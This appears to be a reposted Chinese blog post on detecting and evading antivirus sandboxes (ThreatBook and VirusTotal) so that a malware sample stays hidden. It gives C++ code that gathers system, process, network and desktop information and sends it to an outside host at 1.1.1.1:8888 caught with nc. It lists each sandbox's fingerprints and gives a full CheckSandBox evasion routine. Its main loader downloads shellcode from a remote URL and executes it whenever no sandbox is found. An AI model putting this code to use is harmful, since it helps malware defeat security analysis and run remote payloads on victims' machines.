AV沙箱环境检测和绕过
最近马一直被传沙箱,导致检测红的项越来越多,甚至开始有IOC情报了,本文主要针对微步和VT网站上的各沙箱进行环境检测和分析,如果判断为沙箱则退出运行,提高免杀能力,解决人与人之间的各种不信任感。
环境检测准备
需要一个服务端来接受沙箱的数据,一个客户端将相关信息带出沙箱。
服务端
服务端接受的socket连接,想写可以自己实现,或者不想写直接用nc代替。
注:如果收不到数据,就找到台红一点的VPS
╰─# nc -nlvp 8889
客户端
-
编写客户端来获取一些基本信息,主要需要一个执行命令的函数和socket链接,执行命令可能会被报毒,但是没有关系,只是为了方便探测才这么写。
// 执行命令
std::string execCmd(const char* cmd)
{
char buffer[MAX_PATH] = { 0 };
std::string result;
FILE* pipe = _popen(cmd, "r");
if (!pipe) throw std::runtime_error("_popen() failed!");
while (!feof(pipe))
{
if (fgets(buffer, MAX_PATH, pipe) != NULL)
result += buffer;
}
_pclose(pipe);
return result;
}
// SOCKET连接
int main(){
WORD sockVersion = MAKEWORD(2, 2);
WSAData saData;
if (WSAStartup(sockVersion, &saData)) {
return 0;
}
SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sclient == INVALID_SOCKET) {
printf("INVALID SOCKET");
return 0;
}
sockaddr_in serAddr = { 0 };
serAddr.sin_family = AF_INET;
serAddr.sin_port = htons(8888);
inet_pton(AF_INET, "1.1.1.1", &serAddr.sin_addr);
if (connect(sclient, (sockaddr *) &serAddr, sizeof serAddr) == SOCKET_ERROR) {
printf("CONNECT ERROR!");
closesocket(sclient);
return 0;
}
// tasklist /svc
string tasklist_result = execCmd("tasklist /svc");
send(sclient, tasklist_result.c_str(), strlen(tasklist_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// systeminfo
string systeminfo_result = execCmd("systeminfo");
send(sclient, systeminfo_result.c_str(), strlen(systeminfo_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// arp -a
string arp_result = execCmd("arp -a");
send(sclient, arp_result.c_str(), strlen(arp_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// netstat -ano
string netstat_result = execCmd("netstat -ano ");
send(sclient, netstat_result.c_str(), strlen(netstat_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// ipconfig -a
string ipconfig_result = execCmd("ipconfig /all");
send(sclient, ipconfig_result.c_str(), strlen(ipconfig_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// 桌面文件
string desktop_result = execCmd("dir %USERPROFILE%\DESKTOP");
send(sclient, desktop_result.c_str(), strlen(desktop_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// net use
string NETUSE_result = execCmd("net use");
send(sclient, NETUSE_result.c_str(), strlen(NETUSE_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
closesocket(sclient);
WSACleanup();
return 0;
}
分析
微步
-
微步带回来的数据
process id: 0 , process name : [System Process]
process id: 4 , process name : System
process id: 244 , process name : smss.exe
process id: 328 , process name : csrss.exe
process id: 364 , process name : csrss.exe
process id: 372 , process name : wininit.exe
process id: 412 , process name : winlogon.exe
process id: 460 , process name : services.exe
process id: 468 , process name : lsass.exe
process id: 476 , process name : lsm.exe
process id: 580 , process name : svchost.exe
process id: 660 , process name : svchost.exe
process id: 744 , process name : svchost.exe
process id: 784 , process name : svchost.exe
process id: 832 , process name : svchost.exe
process id: 856 , process name : svchost.exe
process id: 928 , process name : audiodg.exe
process id: 1092 , process name : svchost.exe
process id: 1216 , process name : spoolsv.exe
process id: 1284 , process name : svchost.exe
process id: 1412 , process name : dwm.exe
process id: 1440 , process name : explorer.exe
process id: 1464 , process name : taskhost.exe
process id: 1528 , process name : AcrylicService.exe
process id: 1672 , process name : svchost.exe
process id: 292 , process name : pythonw.exe
process id: 1592 , process name : SearchIndexer.exe
process id: 1068 , process name : SearchProtocolHost.exe
process id: 316 , process name : SearchFilterHost.exe
process id: 1264 , process name : pythonw.exe
process id: 1884 , process name : wsqmcons.exe
process id: 1272 , process name : sdclt.exe
process id: 1356 , process name : rundll32.exe
process id: 2088 , process name : taskhost.exe
process id: 2128 , process name : taskhost.exe
process id: 2232 , process name : dllhost.exe
process id: 2320 , process name : WinSAT.exe
process id: 2328 , process name : conhost.exe
process id: 2464 , process name : hhasdjalksdjlqwe.exe
process id: 2524 , process name : conhost.exe
Host Name: VBCCSB-PC
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: vbccsb
Registered Organization:
Product ID: 24771-620-3228555-84158
Original Install Date: 5/23/2018, 2:41:28 AM
System Boot Time: 10/23/2021, 10:18:41 PM
System Manufacturer: System manufacturer
System Model: System manufacturer
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 60 Stepping 1 GenuineIntel ~2394 Mhz
BIOS Version: American Megatrends Inc. 1101, 2/4/2013
Windows Directory: C:Windows
System Directory: C:Windowssystem32
Boot Device: DeviceHarddiskVolume1
System Locale: zh-cn;Chinese (China)
Input Locale: en-us;English (United States)
Time Zone: (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory: 3,071 MB
Available Physical Memory: 2,585 MB
Virtual Memory: Max Size: 6,141 MB
Virtual Memory: Available: 5,646 MB
Virtual Memory: In Use: 495 MB
Page File Location(s): C:pagefile.sys
Domain: WORKGROUP
Logon Server: \VBCCSB-PC
Hotfix(s): 16 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2819745
[06]: KB2533623
[07]: KB2639308
[08]: KB2729094
[09]: KB2731771
[10]: KB2786081
[11]: KB2834140
[12]: KB2872035
[13]: KB2882822
[14]: KB2888049
[15]: KB2999226
[16]: KB976902
Network Card(s): 1 NIC(s) Installed.
[01]: Realtek RTL8139C+ Fast Ethernet NIC
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 192.168.122.171
[02]: fe80::7c81:79a:37e:85e5
Interface: 192.168.122.171 --- 0xb
Internet Address Physical Address Type
192.168.122.1 52-54-00-55-d4-9a dynamic
192.168.122.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 660
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 292
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 372
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 744
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 856
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 460
TCP 0.0.0.0:49158 0.0.0.0:0 LISTENING 468
TCP 192.168.122.171:139 0.0.0.0:0 LISTENING 4
TCP 192.168.122.171:8000 192.168.122.1:52332 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52334 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52336 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52342 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52344 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52360 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52362 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52364 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52368 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52418 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52430 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52488 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52564 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52626 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52662 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52672 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52692 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52718 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52732 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52740 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52802 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52816 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52838 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52852 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52862 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52888 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52904 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52918 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52934 TIME_WAIT 0
TCP 192.168.122.171:8000 192.168.122.1:52956 TIME_WAIT 0
TCP 192.168.122.171:49156 192.168.122.1:4455 FIN_WAIT_2 520
TCP 192.168.122.171:49159 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49161 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49162 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49163 1.1.1.1:8888 ESTABLISHED 2464
TCP 192.168.122.171:49164 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49165 192.168.122.1:2052 TIME_WAIT 0
TCP 192.168.122.171:49166 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49167 192.168.122.1:2052 TIME_WAIT 0
TCP 192.168.122.171:49171 192.168.122.1:2052 TIME_WAIT 0
TCP 192.168.122.171:49172 192.168.122.1:2052 TIME_WAIT 0
TCP 192.168.122.171:49173 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49174 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49175 192.168.122.1:2052 TIME_WAIT 0
TCP 192.168.122.171:49177 192.168.122.1:2052 TIME_WAIT 0
TCP 192.168.122.171:49178 192.168.122.1:2052 ESTABLISHED 1264
TCP 192.168.122.171:49179 192.168.122.1:2052 ESTABLISHED 1264
TCP [::]:135 [::]:0 LISTENING 660
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 372
TCP [::]:49153 [::]:0 LISTENING 744
TCP [::]:49154 [::]:0 LISTENING 856
TCP [::]:49155 [::]:0 LISTENING 460
TCP [::]:49158 [::]:0 LISTENING 468
UDP 0.0.0.0:53 *:* 1528
UDP 0.0.0.0:500 *:* 856
UDP 0.0.0.0:4500 *:* 856
UDP 0.0.0.0:5355 *:* 1092
UDP 192.168.122.171:137 *:* 4
UDP 192.168.122.171:138 *:* 4
UDP [::]:53 *:* 1528
UDP [::]:500 *:* 856
UDP [::]:4500 *:* 856
UDP [::]:5355 *:* 1092
UDP [fe80::7c81:79a:37e:85e5%11]:546 *:* 744
Windows IP Configuration
Host Name . . . . . . . . . . . . : vbccsb-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
Physical Address. . . . . . . . . : 52-54-00-3E-44-49
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::7c81:79a:37e:85e5%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.122.171(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.122.1
DHCPv6 IAID . . . . . . . . . . . : 240276480
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-96-1C-65-52-54-00-9E-8D-9D
DNS Servers . . . . . . . . . . . : 127.0.0.1
8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{1141D443-46F3-4C40-8D6C-D57632F2B3B2}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes -
微步分析,传了多次样本之后发现有些特别东西
-
进程,有几个用来分析的进程
process id: 1528 , process name : AcrylicService.exe // DNS代理程序,用来检测DNS流量
-
壁纸 , 微步沙箱的壁纸每次是不变的
C:UsersvbccsbAppDataRoamingMicrosoftWindowsThemesTranscodedWallpaper.jpg //路径
1645643018 //壁纸文件的hash -
用户名 , 每次运行沙箱的用户名不变 ,都是vbccsb
主机名:VBCCSB-PC
用户名:vbccsb_*
进程:519e67c447b16520ceaa2b84a8d8fb2da94b8edab
内网IP:192.168.122.192
出口IP:106.75.3.131
主机名:VBCCSB-PC
用户名:vbccsb_*
进程:123.exe
内网IP:192.168.122.192
出口IP:106.75.35.22 -
系统制作厂商和型号 , 正常PC的系统制作厂商都是电脑的牌子 DELL、LENEVO、ASUS
// 微步
System Manufacturer: System manufacturer
System Model: System manufacturer
// 正常的制作厂商和型号,三星、ASUS
System Manufacturer: SAMSUNG
System Model: 670Z5E
System Manufacturer: ASUS
System Model: P5E-VM DO -
性能指标,例如 内存大小、CPU核数等,现在很少见内存少于4G的PC
Total Physical Memory: 3,071 MB
VT沙箱
-
VT 沙箱 回传的数据 ,实际上把样本传到VT上去之后,VT上面的各个引擎会独立运行一遍,会一直回传数据,所以建议服务端自己实现一下,不然会漏掉一些沙箱数据,下面是个别例子。
D:TRANSFERacb63d33-1034-ec11-b6ee-002248784cbezxczxczqwe12312.exe
process id: 0 , process name : [System Process]
process id: 4 , process name : System
process id: 252 , process name : smss.exe
process id: 340 , process name : csrss.exe
process id: 416 , process name : csrss.exe
process id: 432 , process name : wininit.exe
process id: 472 , process name : winlogon.exe
process id: 540 , process name : services.exe
process id: 548 , process name : lsass.exe
process id: 616 , process name : svchost.exe
process id: 636 , process name : fontdrvhost.exe
process id: 644 , process name : fontdrvhost.exe
process id: 712 , process name : svchost.exe
process id: 816 , process name : dwm.exe
process id: 928 , process name : svchost.exe
process id: 936 , process name : svchost.exe
process id: 972 , process name : svchost.exe
process id: 988 , process name : svchost.exe
process id: 364 , process name : svchost.exe
process id: 1044 , process name : svchost.exe
process id: 1072 , process name : svchost.exe
process id: 1180 , process name : VSSVC.exe
process id: 1480 , process name : svchost.exe
process id: 1540 , process name : svchost.exe
process id: 1548 , process name : svchost.exe
process id: 1856 , process name : SecurityHealthService.exe
process id: 1864 , process name : svchost.exe
process id: 1872 , process name : VmRemoteGuest.exe
process id: 1568 , process name : sihost.exe
process id: 1832 , process name : taskhostw.exe
process id: 2196 , process name : explorer.exe
process id: 2264 , process name : svchost.exe
process id: 2552 , process name : ShellExperienceHost.exe
process id: 2588 , process name : SearchUI.exe
process id: 2724 , process name : RuntimeBroker.exe
process id: 2760 , process name : WmiPrvSE.exe
process id: 2976 , process name : backgroundTaskHost.exe
process id: 2356 , process name : backgroundTaskHost.exe
process id: 2432 , process name : RemindersServer.exe
process id: 3584 , process name : msiexec.exe
process id: 3660 , process name : svchost.exe
process id: 2896 , process name : GoogleUpdateSetup.exe
process id: 2488 , process name : GoogleUpdate.exe
process id: 3180 , process name : cmd.exe
process id: 1364 , process name : conhost.exe
process id: 1436 , process name : Detonate.exe
process id: 4016 , process name : Sysmon64.exe
process id: 2628 , process name : BackgroundTransferHost.exe
process id: 4000 , process name : unsecapp.exe
process id: 3360 , process name : Sysmon64.exe
process id: 2460 , process name : WmiPrvSE.exe
process id: 3572 , process name : zxczxczqwe12312.exe
process id: 3108 , process name : conhost.exe
Host Name: WIN-5E07COS9ALR
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: N/A
Registered Organization: N/A
Product ID: 00329-00000-00003-AA343
Original Install Date: 4/11/2017, 1:58:46 PM
System Boot Time: 10/23/2021, 12:02:42 AM
System Manufacturer: Microsoft Corporation
System Model: Virtual Machine
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2295 Mhz
BIOS Version: American Megatrends Inc. 090007 , 5/18/2018
Windows Directory: C:Windows
System Directory: C:Windowssystem32
Boot Device: DeviceHarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,024 MB
Available Physical Memory: 323 MB
Virtual Memory: Max Size: 2,752 MB
Virtual Memory: Available: 2,138 MB
Virtual Memory: In Use: 614 MB
Page File Location(s): C:pagefile.sys
Domain: WORKGROUP
Logon Server: \WIN-5E07COS9ALR
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Microsoft Hyper-V Network Adapter
Connection Name: Ethernet 4
DHCP Enabled: No
IP address(es)
[01]: 192.168.0.11
[02]: fe80::89e3:b1dc:c950:614a
Hyper-V Requirements: VM Monitor Mode Extensions: No
Virtualization Enabled In Firmware: No
Second Level Address Translation: No
Data Execution Prevention Available: Yes
Interface: 192.168.0.11 --- 0x6
Internet Address Physical Address Type
192.168.0.1 00-15-5d-00-10-00 dynamic
192.168.255.255 ff-ff-ff-ff-ff-ff static
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 712
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 936
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 432
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 988
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 928
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 540
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 548
TCP 192.168.0.11:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.11:49684 23.223.55.43:80 ESTABLISHED 4016
TCP 192.168.0.11:49685 13.107.4.50:80 ESTABLISHED 4016
TCP 192.168.0.11:49686 23.49.139.27:80 ESTABLISHED 4016
TCP 192.168.0.11:49687 72.21.91.29:80 ESTABLISHED 4016
TCP 192.168.0.11:49688 23.49.139.27:80 ESTABLISHED 4016
TCP 192.168.0.11:49689 72.21.91.29:80 ESTABLISHED 4016
TCP 192.168.0.11:49691 104.98.114.26:443 ESTABLISHED 2628
TCP 192.168.0.11:49692 104.98.114.26:443 ESTABLISHED 2628
TCP 192.168.0.11:49693 72.21.91.29:80 ESTABLISHED 2628
TCP 192.168.0.11:49694 23.49.139.27:80 ESTABLISHED 4016
TCP 192.168.0.11:49695 72.21.91.29:80 ESTABLISHED 4016
TCP 192.168.0.11:49696 23.49.139.27:80 ESTABLISHED 4016
TCP [::]:135 [::]:0 LISTENING 712
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 936
TCP [::]:49664 [::]:0 LISTENING 432
TCP [::]:49665 [::]:0 LISTENING 988
TCP [::]:49666 [::]:0 LISTENING 928
TCP [::]:49667 [::]:0 LISTENING 540
TCP [::]:49668 [::]:0 LISTENING 548
UDP 0.0.0.0:3389 *:* 936
UDP 192.168.0.11:137 *:* 4
UDP 192.168.0.11:138 *:* 4
UDP [::]:3389 *:* 936
UDP [fe80::89e3:b1dc:c950:614a%6]:546 *:* 988
Windows IP Configuration
Host Name . . . . . . . . . . . . : WIN-5E07COS9ALR
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Ethernet 4:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Hyper-V Network Adapter #4
Physical Address. . . . . . . . . : 00-15-5D-00-08-2A
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::89e3:b1dc:c950:614a%6(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.0.11(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 192.168.0.1
DHCPv6 IAID . . . . . . . . . . . : 100668765
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-23-4E-C8-63-00-15-5D-1A-91-10
DNS Servers . . . . . . . . . . . : 168.63.129.16
NetBIOS over Tcpip. . . . . . . . : Enabled -
VT沙箱分析,VT上大多是些国外的沙箱,所以跟微步还有点不同。
-
文件名,部分沙箱会将样本 Hash 重命名或者下载的样本都是以 HASH命名的文件,也可以通过这个特征检测
676ef88e8c8772b4751605835cb3a8a5.exe
进程,部分沙箱也会开以下进程
AcrylicService.exe
-
性能 ,大多数沙箱的内存都小于4G
4.txt:Available Physical Memory: 560 MB
5.txt:Available Physical Memory: 1,499 MB
6.txt:Available Physical Memory: 915 MB
7.txt:Available Physical Memory: 1,003 MB
8.txt:Available Physical Memory: 5,228 MB
9.txt:Available Physical Memory: 5,215 MB -
语言 , 国外沙箱的语言大多为英文
╰─# grep 'System Locale' *.txt
4.txt:System Locale: en-us;English (United States)
5.txt:System Locale: en-us;English (United States)
6.txt:System Locale: en-us;English (United States)
7.txt:System Locale: en-us;English (United States)
8.txt:System Locale: en-us;English (United States)
9.txt:System Locale: en-us;English (United States) -
时区 ,VT上的沙箱大多为国外时区,国内的时区为东八区
╰─# grep 'Time Zone' *.txt
4.txt:Time Zone: (UTC-08:00) Pacific Time (US & Canada)
5.txt:Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
6.txt:Time Zone: (UTC-05:00) Eastern Time (US & Canada)
7.txt:Time Zone: (UTC+02:00) Athens, Bucharest
8.txt:Time Zone: (UTC) Co-ordinated Universal Time
9.txt:Time Zone: (UTC) Co-ordinated Universal Time -
系统制作厂商和型号,部分沙箱的制作厂商为QEMU
╰─# grep 'System Manufacturer' *.txt
4.txt:System Manufacturer: DELL
5.txt:System Manufacturer: Dell Inc.
6.txt:System Manufacturer: ASUS
7.txt:System Manufacturer: SAMSUNG
8.txt:System Manufacturer: QEMU
9.txt:System Manufacturer: QEMU
╰─# grep 'System Model' *.txt
4.txt:System Model: Standard PC (i440FX + PIIX, 1996)
5.txt:System Model: OptiPlex 7010
6.txt:System Model: P5E-VM DO
7.txt:System Model: 670Z5E
8.txt:System Model: Standard PC (i440FX + PIIX, 1996)
9.txt:System Model: Standard PC (i440FX + PIIX, 1996)
绕过
-
可以根据上述特征进行分析环境,判断是沙箱则执行别的逻辑。另外沙箱的特征和检测方式很多,下列的检测方式可能合适也可能不合适,需要根据使用场景进行选择。
VOID BypassAV::CheckSandBox(BOOL *Flag) {
// 定义异常
runtime_error err("55551~~~~~~~~~~~~~~");
// 检测微步 ,壁纸hash 或 用户名
char szDesktopPicPath[MAX_PATH] = { 0 };
GetWallPaperPic(szDesktopPicPath);
auto tmp1 = fs::path{ szDesktopPicPath };
size_t stHash = fs::hash_value(tmp1);
size_t stThreatboxHash = 1645643018;
DWORD dwSize = MAX_PATH;
TCHAR tName[1024] = { 0 };
GetUserName(tName, &dwSize);
if ((stHash == stThreatboxHash) || (lstrcmp(tName, L"vbccsb") == 0)) {
*Flag = TRUE;
throw err;
}
// 检测VT
string szFullPathName = __argv[0];
if (szFullPathName.find("TRANSFER") !=szFullPathName.npos) {
*Flag = TRUE;
throw err;
}
// 通用沙箱检测
//
// 检测沙箱重命名后的文件名长度,最多16个汉字, 一共32个字节长度(排除.exe) < md5 加密后长度为33个字节 + 4个字节(.exe )
int pos = szFullPathName.rfind("\");
string szFileName = szFullPathName.substr(pos + 1, szFullPathName.length()-1);
if (szFileName.length() > 36) {
*Flag = TRUE;
throw err;
}
// 检测物理内存 < 3G , CPU核数 < 3
MEMORYSTATUSEX statex;
statex.dwLength = sizeof(statex);
GlobalMemoryStatusEx(&statex);
// CPU
SYSTEM_INFO sysinfo;
GetSystemInfo(&sysinfo);
float fMemSize = (float)statex.ullTotalPhys / (1024 * 1024 * 1024);
if (fMemSize < 3 || sysinfo.dwNumberOfProcessors <3 )
{
*Flag = TRUE;
throw err;
}
// 检测系统语言,非中文则退出
LANGID lid = GetSystemDefaultLangID();
if (lid != 0x0804) {
*Flag = TRUE;
throw err;
}
// 检测时区是否为东八区
TIME_ZONE_INFORMATION tzinfo;
GetTimeZoneInformation(&tzinfo);
if ((tzinfo.Bias / (-60)) != 8) {
*Flag = TRUE;
throw err;
}
// 检测计算机制造商和型号中带有 virtual 、vmware、qemu 、hyper、docker关键字
string sWMIResult;
GetManufacturerModelByWMI(&sWMIResult);
if (sWMIResult.find("virtual") !=sWMIResult.npos ||
sWMIResult.find("qemu") != sWMIResult.npos ||
sWMIResult.find("vmware") != sWMIResult.npos ||
sWMIResult.find("docker") != sWMIResult.npos ||
sWMIResult.find("hyper") != sWMIResult.npos) {
*Flag = TRUE;
throw err;
}
// 检测进程 AcrylicService.exe vmtoolsd.exe
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 processEntry32 = { sizeof PROCESSENTRY32 };
BOOL bSuccess = Process32First(hSnapshot, &processEntry32);
if (bSuccess)
{
do
{
char szProcessBuf[MAX_PATH] = { 0 };
sprintf(szProcessBuf, "%ls",processEntry32.szExeFile);
if (strcmp(szProcessBuf, "AcrylicService.exe") == 0 ||
strcmp(szProcessBuf, "vmtoolsd.exe") == 0
) {
*Flag = TRUE;
throw err;
}
} while (Process32Next(hSnapshot, &processEntry32));
}
} -
主逻辑 ,一定要放一个Flag,不然抛出去的异常可能会被沙箱接收处理,程序并不会退出,所以需要根据flag判断更改逻辑。
注意,光有检测代码,行为会非常可疑,尽量加点垃圾代码混淆一下
#include "BypassAV.h"
int main() {
BypassAV* bypassav = new BypassAV();
BOOL FLAG = FALSE;
bypassav->CheckSandBox(&FLAG);
if (FLAG) {
// 如果沙箱处理了抛出的异常则执行这边的逻辑,不处理则会直接退出
bypassav->ConfuseCode();
string htmlResult;
bypassav->Download("www.baidu.com", "80", "/index.html", htmlResult);
ofstream ofs("index.html", ios::out | ios::trunc);
ofs << htmlResult.c_str();
ofs.close();
}
else {
// 执行shellcode
string htmlResult;
bypassav->Download("example.com", "80", "/1635699663.858868.txt", htmlResult);
bypassav->ExecShellcode(htmlResult.c_str());
}
return -1;
} -
实际测试效果:VT (2/68 ),无沙箱上线,有两个下不去猜测是被检测到了部分敏感函数 ;微步退出运行,无相关行为
https://s.threatbook.cn/report/file/06348542967f879b37a3e8d9c35159a24b4703ca6b8b979900bb2e6a5c0c342e/?env=win7_sp1_enx86_office2013
https://www.virustotal.com/gui/file/06348542967f879b37a3e8d9c35159a24b4703ca6b8b979900bb2e6a5c0c342e/detection
参考资料:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://bbs.kafan.cn/thread-2082898-1-1.html
原文始发于微信公众号(清河六点下班):沙箱环境检测和绕过